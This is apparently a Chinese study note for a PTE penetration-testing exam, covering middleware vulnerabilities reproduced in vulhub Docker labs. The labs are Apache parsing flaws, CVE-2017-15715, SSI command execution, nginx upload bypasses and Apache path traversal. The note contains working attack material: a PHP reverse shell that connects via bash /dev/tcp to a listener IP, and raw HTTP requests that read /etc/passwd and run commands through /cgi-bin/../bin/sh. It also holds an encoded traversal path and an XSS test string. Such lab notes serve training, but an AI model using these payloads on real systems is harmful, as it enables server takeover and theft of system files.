PTE-中间件安全

DOCKER环境,一般是80 8080 8081端口

1 apache位置扩展名解析漏洞

复制代码
cd vulhub-master/httpd/apache_parsing_vulnerability/
docker-compose up -d

修改一句话的后缀 直接上传

蚁剑

2 CVE-2017-15715

复制代码
docker-compose stop
cd ..
cd CVE-2017-15715/
docker-compose up -d

在提交的时候抓包

在文件名后加+ 然后到HEX下把对应的2b改成0a, 放过去

直接访问不行,因为$匹配OA 注意这里0A要大写

能过黑名单,不能过白名单

3 SSI远程命令执行漏洞(服务器端包含)

复制代码
docker-compose stop
cd ..
cd ssi-rce
docker-compose up -d

开ssi-rce

写shtml

直接上传

点击访问

需要查什么可以通过修改命令

但是再docker1中

4 nginx解析漏洞 过白名单

5 nginx文件名逻辑漏洞 过白名单

上传时抓包 文件名后加空格

正常访问不到,和视频不一样

6 可以反向shell <?php system("bash -c 'bash -i &>/dev/tcp/192.168.100.137/10086 0>&1'");?>

上传也要加空格,同上,访问也一样

访问前开监听,访问后可以连到服务器

6

%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

GET /icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1

POST /cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1

Host: 192.168.100.131:8080

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

If-Modified-Since: Mon, 11 Jun 2007 18:53:14 GMT

If-None-Match: "2d-432a5e4a73a80"

Cache-Control: max-age=0

Content-Length: 7

echo;id

GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1

<script>alert('xss')</script>

相关推荐
wanhengidc6 小时前
当云手机出现卡顿怎么办?
运维·服务器·安全·智能手机
athink_cn14 小时前
HTTP/2新型漏洞“MadeYouReset“曝光:可发动大规模DoS攻击
网络·网络协议·安全·http·网络安全
zzc92114 小时前
TLSv1.2协议与TCP/UDP协议传输数据内容差异
网络·测试工具·安全·wireshark·ssl·密钥·tlsv1.2
huluang16 小时前
医院网络安全重保行动方案
网络·安全
九州ip动态16 小时前
如何安全使用改IP软件更改异地IP地址?
网络·tcp/ip·安全
杭州泽沃电子科技有限公司16 小时前
告别翻山越岭!智能监拍远程守护输电线路安全
运维·人工智能·科技·安全
wha the fuck40418 小时前
攻防世界—unseping(反序列化)
安全·序列化和反序列化
David WangYang21 小时前
基于 IOT 的安全系统,带有使用 ESP8266 的语音消息
物联网·安全·语音识别
合作小小程序员小小店1 天前
SDN安全开发环境中常见的框架,工具,第三方库,mininet常见指令介绍
python·安全·生成对抗网络·网络安全·网络攻击模型
数据智能老司机1 天前
实现逆向工程——汇编指令演练
安全·逆向·汇编语言